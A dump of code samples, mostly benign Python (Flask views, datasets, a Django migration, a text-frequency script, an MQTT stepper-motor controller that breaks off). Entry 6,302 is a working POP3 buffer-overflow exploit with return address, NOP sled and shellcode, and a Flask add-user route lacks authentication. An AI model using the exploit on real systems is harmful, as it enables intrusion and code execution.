index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
6,300 | 29428e9ca4373c9f19d1412046ebe4fc3b1c48e3 | #!/usr/bin/python
"""Source base class.
Based on the OpenSocial ActivityStreams REST API:
http://opensocial-resources.googlecode.com/svn/spec/2.0.1/Social-API-Server.xml#ActivityStreams-Service
"""
__author__ = ['Ryan Barrett <activitystreams@ryanb.org>']
import datetime
try:
import json
except ImportError:
import simplejson as json
import logging
from webob import exc
from google.appengine.api import urlfetch
ME = '@me'
SELF = '@self'
ALL = '@all'
FRIENDS = '@friends'
APP = '@app'
class Source(object):
  """Abstract base class for a source (e.g. Facebook, Twitter).

  Concrete subclasses must override the class constants below and implement
  get_activities().

  OAuth credentials may be extracted from the current request's query
  parameters, e.g. access_token_key and access_token_secret for Twitter
  (OAuth 1.0a) and access_token for Facebook (OAuth 2.0).

  Attributes:
    handler: the current RequestHandler

  Class constants:
    DOMAIN: string, the source's domain
    FRONT_PAGE_TEMPLATE: string, the front page child template filename
    AUTH_URL: string, the url for the "Authenticate" front page link
  """

  def __init__(self, handler):
    self.handler = handler

  def get_activities(self, user_id=None, group_id=None, app_id=None,
                     activity_id=None, start_index=0, count=0):
    """Return a total count and list of ActivityStreams activities.

    If user_id is provided, only that user's activity(s) are included.
    start_index and count determine paging, as described in the spec:
    http://activitystrea.ms/draft-spec.html#anchor14

    app id is just object id:
    http://opensocial-resources.googlecode.com/svn/spec/2.0/Social-Data.xml#appId

    group id is string id of group or @self, @friends, @all:
    http://opensocial-resources.googlecode.com/svn/spec/2.0/Social-Data.xml#Group-ID

    Args:
      user_id: string object id, defaults to the currently authenticated user
      group_id: string object id, defaults to the current user's friends
      app_id: string object id
      activity_id: string object id
      start_index: int >= 0
      count: int >= 0

    Returns:
      (total_results, activities) tuple
      total_results: int or None (e.g. if it can't be calculated efficiently)
      activities: list of activity dicts to be JSON-encoded
    """
    raise NotImplementedError()

  def urlfetch(self, url, **kwargs):
    """Wraps urlfetch. Passes error responses through to the client.

    ...by raising the matching webob HTTPException.

    Args:
      url: str
      kwargs: passed through to urlfetch.fetch()

    Returns:
      the HTTP response body

    Raises:
      webob.exc.HTTPException subclass matching the upstream status code
      (HTTPInternalServerError when the code has no webob mapping).
    """
    logging.debug('Fetching %s with kwargs %s', url, kwargs)
    resp = urlfetch.fetch(url, deadline=999, **kwargs)
    if resp.status_code == 200:
      return resp.content
    logging.warning('GET %s returned %d:\n%s',
                    url, resp.status_code, resp.content)
    self.handler.response.headers.update(resp.headers)
    self.handler.response.out.write(resp.content)
    # Bug fix: status_map.get() returns None for status codes webob doesn't
    # know about, which made the raise itself fail with a TypeError. Fall
    # back to HTTPInternalServerError for unmapped codes.
    raise exc.status_map.get(resp.status_code,
                             exc.HTTPInternalServerError)(resp.content)

  def tag_uri(self, name):
    """Returns a tag URI string for this source and the given string name.

    Example return value: 'tag:twitter.com,2012:snarfed_org/172417043893731329'

    Background on tag URIs: http://taguri.org/
    """
    return 'tag:%s,%d:%s' % (self.DOMAIN, datetime.datetime.now().year, name)
|
6,301 | 348676e43e4dfbbe7cd0c0527acb8c613d3d1ebc | #!/usr/bin/env python
import sys
from static_pipeline import render
from static_pipeline.lib import argparse
if __name__ == "__main__":
    """ Use argparse to decide what to do
    """
    # Command-line front end for static_pipeline: currently only the
    # 'render' subcommand exists.
    # set up arg parsing
    parser = argparse.ArgumentParser(
        description='render and rearrange files ' \
        '(presumably for serving them as part of a website)')
    subparsers = parser.add_subparsers(title='commands', dest="command")
    # render command
    parser_render = subparsers.add_parser('render', help='render files ' \
        'with static-pipeline (based on contents of the settings file)')
    # Module name (without .py) of the settings file to import.
    parser_render.add_argument('--settings-file', default='pipeline_settings')
    # parse (if no command specified, show help)
    if len(sys.argv) < 2:
        sys.argv.append('--help')
    parsed = parser.parse_args()
    if parsed.command == "render":
        try:
            # for whatever reason, sometimes current dir doesn't end up on the pythonpath
            sys.path.append('.')
            # The settings module must define a PIPELINE attribute that
            # describes what to render.
            pipeline_settings = __import__(parsed.settings_file)
            pipeline = pipeline_settings.PIPELINE
        except ImportError:
            # Settings module not importable at all.
            print "No settings file: {0}.py".format(parsed.settings_file)
            sys.exit(1)
        except AttributeError:
            # Module imported fine but has no PIPELINE — treat as a no-op.
            print "No PIPELINE in settings file. Nothing to do."
            sys.exit(0)
        render(pipeline, pipeline_settings)
|
6,302 | 280a4e1fb35937bb5a5c604f69337d30a4b956a9 | #!/usr/bin/env python2
import socket
import struct
RHOST = "10.10.10.2"
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
# OFFSETS
# EIP 4654
# ESP 342
# EBP 4650
# jmp_esp in slmfc.dll at 5f4a358f
jmp_esp = 0x5f4a358f
nop_sled = "\x90" * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b""
shellcode_calc += b"\xba\xd5\x90\xd2\x7d\xdb\xd5\xd9\x74\x24"
shellcode_calc += b"\xf4\x58\x31\xc9\xb1\x36\x31\x50\x13\x83"
shellcode_calc += b"\xe8\xfc\x03\x50\xda\x72\x27\x81\x0c\xf0"
shellcode_calc += b"\xc8\x7a\xcc\x95\x41\x9f\xfd\x95\x36\xeb"
shellcode_calc += b"\xad\x25\x3c\xb9\x41\xcd\x10\x2a\xd2\xa3"
shellcode_calc += b"\xbc\x5d\x53\x09\x9b\x50\x64\x22\xdf\xf3"
shellcode_calc += b"\xe6\x39\x0c\xd4\xd7\xf1\x41\x15\x10\xef"
shellcode_calc += b"\xa8\x47\xc9\x7b\x1e\x78\x7e\x31\xa3\xf3"
shellcode_calc += b"\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80"
shellcode_calc += b"\x04\x38\x4c\xb9\x0c\x22\x91\x84\xc7\xd9"
shellcode_calc += b"\x61\x72\xd6\x0b\xb8\x7b\x75\x72\x75\x8e"
shellcode_calc += b"\x87\xb2\xb1\x71\xf2\xca\xc2\x0c\x05\x09"
shellcode_calc += b"\xb9\xca\x80\x8a\x19\x98\x33\x77\x98\x4d"
shellcode_calc += b"\xa5\xfc\x96\x3a\xa1\x5b\xba\xbd\x66\xd0"
shellcode_calc += b"\xc6\x36\x89\x37\x4f\x0c\xae\x93\x14\xd6"
shellcode_calc += b"\xcf\x82\xf0\xb9\xf0\xd5\x5b\x65\x55\x9d"
shellcode_calc += b"\x71\x72\xe4\xfc\x1f\x85\x7a\x7b\x6d\x85"
shellcode_calc += b"\x84\x84\xc1\xee\xb5\x0f\x8e\x69\x4a\xda"
shellcode_calc += b"\xeb\x96\xa8\xcf\x01\x3f\x75\x9a\xa8\x22"
shellcode_calc += b"\x86\x70\xee\x5a\x05\x71\x8e\x98\x15\xf0"
shellcode_calc += b"\x8b\xe5\x91\xe8\xe1\x76\x74\x0f\x56\x76"
shellcode_calc += b"\x5d\x61\x3d\xfc\x7e\x0b\xce\x99\x0c\xd3"
shellcode_calc += b"\x1f\x03\x95\x77\x7f\xa5\x34\x13\x1a\x09"
shellcode_calc += b"\xd1\x82\x8f\x2c\x2f\x35\x2e\xdc\x3c\xb5"
buf = ""
buf += "A" * (offset_srp - len(buf))
buf += struct.pack("<I", jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close
|
6,303 | 9a6f4f0eac5d9e5b4b92fcb2d66d39df15b3b281 | # -*- coding: utf-8 -*-
from flask import abort, flash, redirect, render_template, url_for, request
from flask_login import current_user, login_required
from . import user
from .. import db
from models import User
def check_admin():
    """Abort the request with HTTP 403 unless the current user is an admin."""
    if current_user.is_admin:
        return
    abort(403)
@user.route('/users')
@login_required
def list_users():
    """Render the admin-only user list, newest account first."""
    check_admin()
    newest_first = User.query.order_by(-User.id)
    return render_template('user_list.html', users=newest_first)
#@login_required
@user.route('/users/add', methods=['GET', 'POST'])
def add_user():
    """Load the add-user form (GET) or create a new user (POST).

    On success redirects to the user list; on a failed commit (most likely a
    duplicate username) rolls back and redirects back to this form.
    """
    # NOTE(review): @login_required and check_admin() are commented out, so
    # this endpoint is publicly reachable — confirm that is intentional.
    #check_admin()
    if request.method == 'POST':
        # NOTE(review): getlist('is_admin') returns a *list*, not a boolean
        # (any non-empty list is truthy) — confirm the User model coerces it.
        # Renamed local from `user` to avoid shadowing the blueprint.
        new_user = User(username=request.form['username'],
                        password=request.form['password'],
                        is_admin=request.form.getlist('is_admin'))
        try:
            # add user to the database
            db.session.add(new_user)
            db.session.commit()
            # message to the UI
            flash('Utilizador adicionado com sucesso.', 'success')
            # redirect to the users page
            return redirect(url_for('user.list_users'))
        except Exception:
            # Bug fix: roll back the failed transaction so the session stays
            # usable for the rest of the request/app lifetime. The most
            # likely cause is a unique-constraint violation on the username.
            db.session.rollback()
            flash('Erro: username já existe.', 'danger')
            return redirect(url_for('user.add_user'))
    # load add user form template
    return render_template('user_add.html')
@user.route('/users/edit/<int:id>', methods=['GET', 'POST'])
@login_required
def edit_user(id):
    """Edit an existing user (admin only): GET shows the form, POST saves."""
    check_admin()
    # get user or error
    user = User.query.get_or_404(id)
    if request.method == 'POST':
        # update user with UI form data
        user.username = request.form['username']
        # NOTE(review): the password is stored exactly as submitted here —
        # confirm the User model hashes it on assignment.
        user.password = request.form['password']
        # NOTE(review): getlist() returns a list, not a boolean — confirm the
        # model coerces it before storing is_admin.
        user.is_admin = request.form.getlist('is_admin')
        # update user in database
        db.session.commit()
        # message to the UI
        flash('Utilizador alterado com sucesso.', 'success')
        # redirect to the users page
        return redirect(url_for('user.list_users'))
    return render_template('user_edit.html', user=user)
@user.route('/users/delete/<int:id>', methods=['GET', 'POST'])
@login_required
def delete_user(id):
    """
    Delete from database
    """
    # Removes the user with the given id, then redirects to the list.
    # NOTE(review): deletion is reachable via plain GET, which makes it
    # vulnerable to CSRF / link prefetching — confirm this is acceptable.
    check_admin()
    # get user or error
    user = User.query.get_or_404(id)
    db.session.delete(user)
    db.session.commit()
    flash('Utilizador removido com sucesso.', 'success')
    # redirect to the users page
    return redirect(url_for('user.list_users'))
|
6,304 | 62a86bd33755510f0d71f4920e63be1a3ce8c563 | from bs4 import BeautifulSoup
import urllib.request
import re
import math
# Query the Bank of China exchange-rate search page and report how many
# result pages there are (the page serves 20 records per page).
# Bug fix: the query string contained "¬hing=" — mojibake of "&nothing="
# ("&not" was rendered as the HTML entity "¬"). Restored the literal
# ampersand so the end-date parameter is actually sent.
url_header = ("http://srh.bankofchina.com/search/whpj/search.jsp"
              "?erectDate=2016-01-25&nothing=2016-02-25&pjname=1314")
Webpage = urllib.request.urlopen(url_header).read()
Webpage = Webpage.decode('UTF-8')
# soup = BeautifulSoup(Webpage)
print(Webpage)
# The page embeds the total record count in a JavaScript variable.
a = re.findall(r'var m_nRecordCount = (\d+)', Webpage)
print(a)
# page_count = soup.find('script')
# print(page_count)
total_page = math.ceil(int(a[0]) / 20)
print(total_page)
6,305 | 870de8888c00bbf9290bcc847e2a4fbb823cd4b7 | import math
import sys
from PIL import Image
import numpy as np
import torch
from torch.utils.data import Dataset
from sklearn.gaussian_process.kernels import RBF
from sklearn.gaussian_process import GaussianProcessRegressor
sys.path.append("..")
from skssl.utils.helpers import rescale_range
__all__ = ["SineDataset", "GPDataset"]
class GPDataset(Dataset):
    """
    Dataset of functions generated by a Gaussian process.

    Items are served sequentially (the index is ignored, see __getitem__);
    once a full epoch has been consumed a fresh set of functions is drawn.

    Parameters
    ----------
    kernel : sklearn.gaussian_process.kernels
        The kernel specifying the covariance function of the GP. If None is
        passed, the kernel "1.0 * RBF(1.0)" is used as default.
    n_samples : int, optional
        Number of sampled functions contained in dataset.
    n_points : int, optional
        Number of points at which to evaluate f(x) for x in min_max.
    min_max : tuple of floats, optional
        Min and max point at which to evaluate the function (bounds).
    """

    def __init__(self,
                 kernel=1. * RBF(length_scale=1.),
                 min_max=(-5, 5),
                 n_samples=1000,
                 n_points=100):
        self.n_samples = n_samples
        self.n_points = n_points
        self.min_max = min_max
        self.gp = GaussianProcessRegressor(kernel=kernel)
        self.data, self.targets = self.precompute_data()

    def __len__(self):
        return self.n_samples

    def __getitem__(self, index):
        # `index` is deliberately ignored: items are random GP draws, so they
        # are served in order, which lets us detect when an epoch is finished
        # and regenerate new functions.
        # Bug fix: the counter used to be incremented *before* indexing,
        # which skipped sample 0 of every generation and, at the epoch
        # boundary, returned sample 0 of the *new* data. Read first, then
        # advance, and regenerate only after the item has been captured.
        i = self.counter
        self.counter += 1
        item = (self.data[i], self.targets[i])
        if self.counter == self.n_samples:
            # Epoch exhausted: draw new functions (this resets the counter).
            self.data, self.targets = self.precompute_data()
        return item

    def precompute_data(self, min_max=None, n_samples=None, ):
        """Draw a fresh dataset from the GP prior and reset the epoch counter."""
        self.counter = 0
        return self._precompute_helper(self.min_max, self.n_samples, self.n_points)

    def _precompute_helper(self, min_max, n_points_owner_ignored=None, n_points=None):
        """Deprecated internal signature shim — see _sample below."""
        # kept for clarity; real work happens in the body that follows
        raise NotImplementedError

    def extrapolation_samples(self, n_samples=1, test_min_max=None, n_points=None):
        """Return a batch of extrapolation data.

        Parameters
        ----------
        n_samples : int, optional
            Number of sampled functions (i.e. batch size).
        test_min_max : tuple of floats, optional
            Testing range. If `None` uses the training one.
        n_points : int, optional
            Number of points at which to evaluate f(x) for x in min_max.
            If None uses `self.n_points`.
        """
        if test_min_max is None:
            test_min_max = self.min_max
        n_points = n_points if n_points is not None else self.n_points
        return self._precompute_helper(test_min_max, n_samples, n_points)
class SineDataset(Dataset):
    """
    Dataset of functions f(x) = a * sin(x - b) with randomly sampled a and b.

    Notes
    -----
    - modified from: https://github.com/EmilienDupont/neural-processes/

    Parameters
    ----------
    amplitude_range : tuple of float, optional
        Range from which the amplitude (i.e. a) of the sine is sampled.
    shift_range : tuple of float, optional
        Range from which the shift (i.e. b) of the sine is sampled.
    n_samples : int, optional
        Number of sampled functions contained in dataset.
    n_points : int, optional
        Number of points at which to evaluate f(x) for x in min_max.
    std_noise : float, optional
        Standard deviation of the additive observation noise.
    min_max : tuple of floats, optional
        Min and max point at which to evaluate the function (bounds).
    """

    def __init__(self,
                 amplitude_range=(-1., 1.),
                 shift_range=(-.5, .5),
                 n_samples=1000,
                 n_points=100,
                 std_noise=0.01,
                 min_max=(-math.pi, math.pi)):
        self.amplitude_range = amplitude_range
        self.shift_range = shift_range
        self.n_samples = n_samples
        self.n_points = n_points
        self.x_dim = 1  # x and y dims are fixed for this dataset
        self.y_dim = 1
        self.std_noise = std_noise
        self.min_max = min_max

        lo_a, hi_a = amplitude_range
        lo_b, hi_b = shift_range
        # One amplitude and one shift per sampled function.
        amplitudes = (hi_a - lo_a) * torch.rand(n_samples, 1, self.y_dim) + lo_a
        shifts = (hi_b - lo_b) * torch.rand(n_samples, 1, self.y_dim) + lo_b

        # Inputs, shape (n_samples, n_points, x_dim): one shared grid.
        grid = torch.linspace(*self.min_max, n_points)
        self.data = grid.view(1, -1, 1).expand(self.n_samples, self.n_points,
                                               self.x_dim)

        # Targets, shape (n_samples, n_points, y_dim): noisy sine evaluations.
        noise = torch.randn_like(self.data) * self.std_noise
        self.targets = amplitudes * torch.sin(self.data - shifts) + noise

        # Rescale inputs to [-1, 1].
        self.data = rescale_range(self.data, self.min_max, (-1, 1))

    def __getitem__(self, index):
        return self.data[index], self.targets[index]

    def __len__(self):
        return self.n_samples
|
6,306 | ddb139fa3fbfa1218459e3865150465a44a03bea | # Created by Yuexiong Ding
# Date: 2018/9/4
# Description:
|
6,307 | c7d8a67587a6ca01c23ed922faabbaca8bbaf337 | import time
import threading
lock_a = threading.Lock()
lock_b = threading.Lock()
def task1():
    """Worker that acquires Lock A then Lock B (the opposite order to task2,
    which is what makes the program deadlock-prone)."""
    print('Task 1 is starting...')
    print('Task 1 is waiting to acquire Lock A')
    lock_a.acquire()
    try:
        print('Task 1 has acquired Lock A')
        print('Task 1 is doing some calculations')
        time.sleep(2)
        print('Task 1 is waiting to acquire Lock B')
        lock_b.acquire()
        try:
            print('Task 1 has acquired Lock B')
            print('Task 1 is doing some calculations')
            time.sleep(2)
            print('Task 1 is releasing both locks')
        finally:
            lock_b.release()
    finally:
        lock_a.release()
def task2():
    """Worker that acquires Lock B then Lock A (the opposite order to task1,
    which is what makes the program deadlock-prone)."""
    print('Task 2 is starting...')
    print('Task 2 is waiting to acquire Lock B')
    lock_b.acquire()
    try:
        print('Task 2 has acquired Lock B')
        print('Task 2 is doing some calculations')
        time.sleep(5)
        print('Task 2 is waiting to acquire Lock A')
        lock_a.acquire()
        try:
            print('Task 2 has acquired Lock A')
            print('Task 2 is doing some calculations')
            time.sleep(5)
            print('Task 2 is releasing both locks')
        finally:
            lock_a.release()
    finally:
        lock_b.release()
if __name__ == '__main__':
    # Run both workers concurrently. Because task1 takes A->B while task2
    # takes B->A, this program is expected to deadlock once each thread holds
    # its first lock — the join() calls below will then never return. This
    # appears to be a deliberate deadlock demonstration.
    t1 = threading.Thread(target=task1)
    t2 = threading.Thread(target=task2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
|
6,308 | 3a5d55ea5a2f4f6cf7aaf55055593db9f8bb3562 | # Generated by Django 3.0.7 on 2020-07-03 11:08
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration for the `descriptor` app.

    Adds the `Parameter` and `Request` models and tightens the choice sets on
    `Service.http_method` and `Service.status`.
    """

    dependencies = [
        ('descriptor', '0007_auto_20200702_1653'),
    ]

    operations = [
        # New model describing a single service parameter.
        migrations.CreateModel(
            name='Parameter',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=40, verbose_name='name')),
                ('format', models.CharField(choices=[('AN', 'alphanumeric'), ('NB', 'number'), ('AR', 'array')], max_length=2, verbose_name='format')),
                ('size', models.CharField(max_length=20, verbose_name='size')),
                ('required', models.BooleanField(default=True, verbose_name='required')),
                ('domain_rules', models.CharField(max_length=120, verbose_name='domain rules')),
            ],
            options={
                'verbose_name': 'parameter',
                # NOTE(review): plural reads 'parameter' (not 'parameters') —
                # likely a typo, but changing it requires a new migration.
                'verbose_name_plural': 'parameter',
            },
        ),
        migrations.AlterField(
            model_name='service',
            name='http_method',
            field=models.CharField(choices=[('GET', 'GET'), ('POST', 'POST'), ('PUT', 'PUT'), ('DELETE', 'DELETE'), ('PATCH', 'PATCH')], max_length=6, verbose_name='method'),
        ),
        migrations.AlterField(
            model_name='service',
            name='status',
            field=models.CharField(choices=[('ST', 'under study'), ('DV', 'under development'), ('HM', 'under test'), ('DP', 'deployed')], max_length=2),
        ),
        # Join model linking a Service to its Parameters.
        migrations.CreateModel(
            name='Request',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('parameter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='descriptor.Parameter')),
                ('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='descriptor.Service')),
            ],
            options={
                'verbose_name': 'request',
                'verbose_name_plural': 'requests',
            },
        ),
    ]
|
6,309 | bb3cba9847f2318a5043975e4b659265a7442177 | #def pizzaTopping():
message1 = "What Pizza do you want?"
message = "What type of Pizza topping do you want?"
message += "\n Enter 'quit' to stop entering toppings"
pizzas = {}
while True:
pizza = input(message1)
topping = input(message)
if topping == "quit":
break
else:
pizzas[pizza] = topping
#toppings.append(topping)
#return toppings
#print(pizzaTopping())
#print('We will add the following toppings: ' + str(toppings))
print(pizzas) |
6,310 | a9b7abaaaa811cf12a15def1f2dd21f95bac3d62 | from django import forms
from django.conf import settings
class SurveyFeedback(forms.Form):
    """Satisfaction survey: a five-level rating plus a free-text comment box.

    Both fields are optional; the textarea wires up a client-side
    remaining-character counter bounded by settings.MAX_CHARS.
    """

    _LEVELS = ('Very Satisfied', 'Satisfied', 'Neither', 'Dissatisfied',
               'Very Dissatisfied')
    # Each choice stores the displayed label itself as the submitted value.
    CHOICES = [(level, level) for level in _LEVELS]

    radioFeedback = forms.ChoiceField(
        label='How satisfied were you with the service you just received?',
        choices=CHOICES,
        widget=forms.RadioSelect(),
        required=False)
    textFeedback = forms.CharField(
        label='Survey Feedback',
        max_length=settings.MAX_CHARS,
        required=False,
        widget=forms.Textarea(attrs={
            'rows': 10,
            'cols': 80,
            'onKeyDown': 'return setTimeout(remainingChars('
                         + str(settings.MAX_CHARS) + '), 100);'}))
|
6,311 | cca9d91fe20e58f233ccfc4100edb748356ed234 | """
Plot funcs
Jan, 2018 Rose Yu @Caltech
"""
import matplotlib.pyplot as plt
import seaborn as sns
from util.matutil import *
from util.batchutil import *
def plot_img():
    """
    plot ground truth (left) and reconstruction (right)
    showing b/w image data of mnist

    NOTE(review): relies on module-level globals `data`, `dec_mean` and
    `model` that are not defined in this file — presumably injected by the
    calling notebook/script; confirm before use.
    """
    plt.subplot(121)
    plt.imshow(data.data.numpy()[0,].squeeze())
    plt.subplot(122)
    # reconstruction is reshaped to 28x28 MNIST-sized images
    plt.imshow(dec_mean.view(-1,28,28).data.numpy()[0,].squeeze())
    plt.show()
    plt.pause(1e-6)
    plt.gcf().clear()
    # also display a latent sample drawn from the model
    sample = model.sample_z(data)
    plt.imshow(sample)
def plot_kde():
    """
    plot the kernel density estimation for 2d distributions

    Ground truth on the left (red), reconstruction on the right (blue).

    NOTE(review): relies on module-level globals `data` and `dec_mean` that
    are not defined in this file — confirm they exist at call time.
    """
    f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)
    sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color="r", shade=True, ax=ax1)
    sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color="b", shade=True, ax=ax2)
    plt.show()
    plt.pause(1e-6)
    plt.gcf().clear()
def plot_ts(data, enc_mean, dec_mean):
    """
    plot time series with uncertainty

    Three panels: raw data (left), reconstruction (middle), and the vech of
    the covariance derived from the encoder mean (right).

    Args:
        data: tensor of shape (batch, N*D); D is hard-coded to 2 below —
            TODO confirm.
        enc_mean: encoder output, reshaped and passed through the project
            helpers bivech2/bvech (from util.matutil / util.batchutil).
        dec_mean: decoder mean with the same layout as `data`.
    """
    # enc_mean, enc_cov = enc
    # dec_mean, dec_cov = dec
    batch_size = data.size()[0]
    D = 2  # variables per time step
    N = int(data.size()[1]/D)
    f, (ax1, ax2, ax3) = plt.subplots(1, 3, sharey=False, sharex=True)
    # plot data
    plt.axes(ax1)
    ax1.set_ylim(-0.1,0.1)
    sns.tsplot(data.view(batch_size,N,-1).data.numpy())
    # plot reconstruction
    plt.axes(ax2)
    ax2.set_ylim(-0.1,0.1)
    sns.tsplot(dec_mean.view(batch_size,N,-1).data.numpy())
    # plot covariance summary derived from the encoder mean
    plt.axes(ax3)
    sample_Sigma = bivech2(enc_mean.view(batch_size,N,-1))
    sample_vechSigma = bvech(sample_Sigma).data.numpy()
    sns.tsplot(sample_vechSigma)
    # plot latent variables
    # sample_Sigma = ivech2x(enc_cov.data.numpy())
    # sample_vechSigma = vechx(sample_Sigma.reshape((-1,N,N)))
    # sns.tsplot(sample_vechSigma)
|
6,312 | 1711f74fae36ba761a7c0d84b95271b4e5043d27 | from app import db, session, Node_Base, Column, relationship
from datetime import datetime
import models
import os
import json
|
6,313 | 6f3aa4e1309745265bb9d79df5f5a352e54493f9 | #!/usr/bin/env python
#coding:utf-8
import jieba.analyse as analyse
from collections import Counter
import time
from os import path
import jieba
import importlib, sys
importlib.reload(sys)
import csv
import pandas as pd
from pandas import DataFrame
jieba.load_userdict("newdict.txt")
d = path.dirname(__file__)
filepath = r'C:\Users\Lenovo\zqrbtest\redup.csv'
def removdup():
    """Drop duplicate titles from data.csv and write the survivors to
    redup.csv (order is not preserved because a set is used)."""
    titles = pd.read_csv(r'C:\Users\Lenovo\zqrbtest\data.csv')['titlec']
    unique_titles = set(titles)
    frame = pd.DataFrame(list(unique_titles), columns=['titlec'])
    frame.to_csv('redup.csv', index=False, encoding='utf_8_sig')
if __name__ == "__main__":
    def stopwordslist(filepath):
        """Load a stop-word list, one word per line, from `filepath`."""
        # NOTE(review): the file handle is never closed and `rs2` is unused.
        stopwords = [line.strip()for line in open(filepath, 'r', encoding='utf-8').read().split('\n')]
        rs2 = []
        return stopwords

    def seg_sentence(sentence):
        """Segment a sentence with jieba, drop stop words and tabs, and
        return the remaining tokens joined by single trailing spaces."""
        sentence_seged = jieba.cut(sentence.strip())
        # NOTE(review): the stop-word file is re-read for every sentence —
        # a membership test against a list, reloaded per call.
        stopwords = stopwordslist('stop.txt')
        outstr = ''
        for word in sentence_seged:
            if word not in stopwords:
                if word != '\t':
                    outstr += word
                    outstr += " "
        return outstr

    # Segment every de-duplicated title and write one line per result.
    inputs = open('redup.csv', 'r', encoding='utf-8')
    outputs = open('hel.csv', 'w', encoding='utf-8')
    for line in inputs:
        line_seg = seg_sentence(line)
        outputs.write(line_seg + '\n')
    outputs.close()
    inputs.close()
if __name__ == "__main__":
    # Full word-frequency pipeline: de-duplicate titles, extract jieba
    # keywords, rank them by frequency, and merge the counts into the
    # master spreadsheet (collection.csv).
    aResult = removdup()
    csvfile = open('wordCount.csv', 'w', newline='', encoding='utf_8_sig')
    spamwriter = csv.writer(csvfile)
    word_list = []
    key_list = []
    # Collect keyword tags from every segmented line.
    for line in open('hel.csv', 'r', encoding='UTF-8'):
        item = line.strip('\n\r').split('\t')
        tags = jieba.analyse.extract_tags(item[0])
        for t in tags:
            word_list.append(t)
    word_dict = {}
    with open("result3.txt", 'w') as wf2:
        # Count occurrences of each keyword.
        for item in word_list:
            if item not in word_dict:
                word_dict[item] = 1
            else:
                word_dict[item] += 1
        orderList = list(word_dict.values())
        orderList.sort(reverse=True)
        # NOTE(review): this ranking is O(n^2); it zeroes each count after
        # emitting it so ties are written once per occurrence of the value.
        for i in range(len(orderList)):
            for key in word_dict:
                if word_dict[key] == orderList[i]:
                    wf2.write(key + ' ' + str(word_dict[key]) + '\n')
                    key_list.append(key)
                    word_dict[key] = 0
    for i in range(len(key_list)):
        spamwriter.writerow((key_list[i], orderList[i]))
    csvfile.close()
    # NOTE(review): written as 'wordCount.csv' but read back as
    # 'wordcount.csv' — only works on case-insensitive filesystems.
    rf_path = 'wordcount.csv'
    title = ['keyut', 'fre']
    r2g = pd.read_csv(rf_path, header=None)
    insertRow = pd.DataFrame([title])
    # NOTE(review): DataFrame.append was removed in pandas >= 2.0.
    r2g = insertRow.append(r2g, ignore_index=True)
    df = r2g.to_csv('wordcount-1.csv', header=None, index=None, encoding='utf_8_sig')
    a = pd.read_csv('wordcount-1.csv')
    # NOTE(review): set_index() returns a new frame; the result is discarded
    # here, so these two calls have no effect on the merge below.
    a.set_index('keyut')
    b = pd.read_csv('total.csv', encoding='utf_8_sig', engine='python')
    b.set_index('keyut')
    c = pd.merge(b, a, on='keyut', how='left')
    c.to_csv('collection.csv', encoding='utf_8_sig')
|
6,314 | 299d13fbcdb75673026db1e3a0352c8b19d453c1 | import paho.mqtt.client as paho
import RPi.GPIO as GPIO
import json, time, math
import clearblade
from clearblade import auth
from clearblade import Client
from urlparse import urlparse
#Fill init values
# Deployment-specific credentials: the bare underscore names below are
# placeholders the integrator must replace before running — as written they
# are undefined names, so the script fails at import time until filled in.
systemKey = ______
secretKey = ______
userName = _______
userPW = _______
edgeIP = "http://_______:9000"
auth = auth.Auth()
userClient = Client.UserClient(systemKey, secretKey, userName, userPW, edgeIP)
auth.Authenticate(userClient)
print "Authenticated"
# Coil activation sequences for the stepper motor: `sequence` drives
# clockwise rotation, `ccwseq` is the same pattern reversed for
# counter-clockwise rotation.
sequence = [
    [1, 1, 0, 0],
    [0, 1, 1, 0],
    [0, 0, 1, 1],
    [1, 0, 0, 1]
]
ccwseq = [
    [1, 0, 0, 1],
    [0, 0, 1, 1],
    [0, 1, 1, 0],
    [1, 1, 0, 0]
]
time.sleep(1)
# Use physical (BOARD) pin numbering; these four pins drive the motor coils.
GPIO.setmode(GPIO.BOARD)
controlPinArray = [31, 33, 35, 37]
for pin in controlPinArray:
    GPIO.setup(pin, GPIO.OUT)
    GPIO.output(pin, 0)
# Stepper motor logic
def StepMotor(controlState, angle):
step = math.ceil(int(angle) * 1.4222222)
print step
stepAngle = int(step)
print "Step Angle "+str(stepAngle)
if controlState == "CW":
for i in range(stepAngle):
for fullStep in range(4):
for pin in range(4):
GPIO.output(controlPinArray[pin], sequence[fullStep][pin])
time.sleep(0.0015)
else:
for i in range(stepAngle):
for halfStep in range(4):
for pin in range(4):
GPIO.output(controlPinArray[pin], ccwseq[halfStep][pin])
time.sleep(0.002)
# Define event callbacks
def on_connect(mosq, obj, rc):
    """Connection callback: report the broker's connect result code."""
    print("rc: %s" % rc)
def on_message(mosq, obj, msg):
    """Message callback: parse the JSON command payload and drive the motor.

    Expected payload shape (inferred from the fields read below — confirm
    against the publisher): {"controlState": "CW"|other, "state": <degrees>}.
    """
    print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
    command = msg.payload
    commandJson = json.loads(command)
    controlState = str(commandJson['controlState'])
    angle = commandJson['state']
    print ("Control State :"+controlState)
    print ("Angle:"+str(angle))
    # Blocks until the rotation completes.
    StepMotor(controlState, angle)
    print "Done"
def on_publish(mosq, obj, mid):
    """Publish callback: report the message id that was sent."""
    print("mid: %s" % mid)
def on_subscribe(mosq, obj, mid, granted_qos):
    """Subscribe callback: report the message id and the granted QoS."""
    print("Subscribed: %s %s" % (mid, granted_qos))
def on_log(mosq, obj, level, string):
